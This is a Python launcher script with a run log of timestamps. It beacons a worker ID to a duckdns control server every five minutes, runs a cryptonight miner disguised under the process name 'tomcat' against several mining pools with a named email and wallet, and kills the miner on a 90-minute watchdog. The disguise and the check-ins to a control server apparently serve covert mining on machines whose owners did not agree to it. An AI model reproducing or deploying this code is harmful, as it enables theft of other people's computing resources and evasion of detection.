import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:02.018909
#2018-02-17 15:59:05.798195
#2018-02-17 17:47:03.822659
#2018-02-17 19:34:06.509135
#2018-02-17 21:23:01.583633
#2018-02-17 23:06:07.444966
#2018-02-18 00:53:07.083918
#2018-02-18 02:41:03.855294
#2018-02-18 04:29:07.189471
#2018-02-18 06:21:01.818540
#2018-02-18 08:09:07.214876
#2018-02-18 09:56:06.239405
#2018-02-18 11:43:03.673065
#2018-02-18 13:28:06.119784
#2018-02-18 15:18:01.836703
#2018-02-18 17:07:03.640572
#2018-02-18 18:54:04.780145
#2018-02-18 20:42:01.449142
#2018-02-18 22:27:01.275399
#2018-02-19 00:16:06.996306
#2018-02-19 02:02:06.720556
#2018-02-19 03:49:05.359735
#2018-02-19 05:34:04.542722
#2018-02-19 07:21:07.824967
#2018-02-19 09:11:05.336779
#2018-02-19 10:59:08.586094
#2018-02-19 12:46:07.852907
#2018-02-19 14:33:07.628116
#2018-02-19 16:20:01.632527
#2018-02-19 18:06:07.371933
#2018-02-19 19:52:01.644886
#2018-02-19 21:39:04.302411
#2018-02-19 23:25:04.711573
#2018-02-20 01:10:08.584656
#2018-02-20 02:59:01.960642
#2018-02-20 04:47:01.941124
#2018-02-20 06:31:05.362863
#2018-02-20 08:17:06.310720
#2018-02-20 10:02:06.995733
#2018-02-20 11:46:07.257067
#2018-02-20 13:34:03.903053
#2018-02-20 15:17:01.490664
#2018-02-20 17:02:07.563855
#2018-02-20 18:50:10.699492
#2018-02-20 20:43:04.483209
#2018-02-20 22:27:06.511269
#2018-02-21 00:07:07.587326
#2018-02-21 01:52:04.374800
#2018-02-21 03:39:05.445775
#2018-02-21 05:27:04.161467
#2018-02-21 07:14:06.891627
#2018-02-21 09:00:10.814802
#2018-02-21 10:48:04.373104
#2018-02-21 12:34:08.025856
#2018-02-21 14:20:13.007236
#2018-02-21 16:07:01.722912
#2018-02-21 17:57:01.520243
#2018-02-21 19:42:08.246057
#2018-02-21 21:32:04.807020
#2018-02-21 23:17:06.005484
#2018-02-22 01:06:06.569003
#2018-02-22 02:54:07.879979
#2018-02-22 04:41:04.494665
#2018-02-22 06:25:07.276943
#2018-02-22 08:13:04.399091
#2018-02-22 10:02:06.248356
#2018-02-22 11:48:13.848950
#2018-02-22 13:33:07.932956
#2018-02-22 15:22:06.154313
#2018-02-22 17:08:08.423331
#2018-02-22 18:56:01.967177
#2018-02-22 20:48:06.630515
#2018-02-22 22:35:04.502499
#2018-02-23 00:22:01.433605
#2018-02-23 02:09:07.677258
#2018-02-23 03:57:01.315584
#2018-02-23 05:45:04.840833
#2018-02-23 07:35:08.965939
#2018-02-23 09:38:05.681372
#2018-02-23 11:41:06.642030
#2018-02-23 13:31:04.710082
#2018-02-23 15:17:02.228308
#2018-02-23 17:04:10.848684
#2018-02-23 18:52:08.471458
#2018-02-23 20:38:04.667041
#2018-02-23 22:25:01.285233
#2018-02-24 00:10:10.833062
#2018-02-24 02:02:04.497215
#2018-02-24 03:52:05.983861
#2018-02-24 05:40:02.819667
#2018-02-24 07:29:01.585814
#2018-02-24 09:16:07.360760
#2018-02-24 11:10:06.279548
#2018-02-24 12:58:01.271851
#2018-02-24 14:46:06.648783
#2018-02-24 16:38:01.849663
#2018-02-24 18:26:01.658981
#2018-02-24 20:12:04.293002
#2018-02-24 21:57:03.702064
#2018-02-25 00:57:05.360775
#2018-02-25 04:49:02.074230
#2018-02-25 09:14:01.341181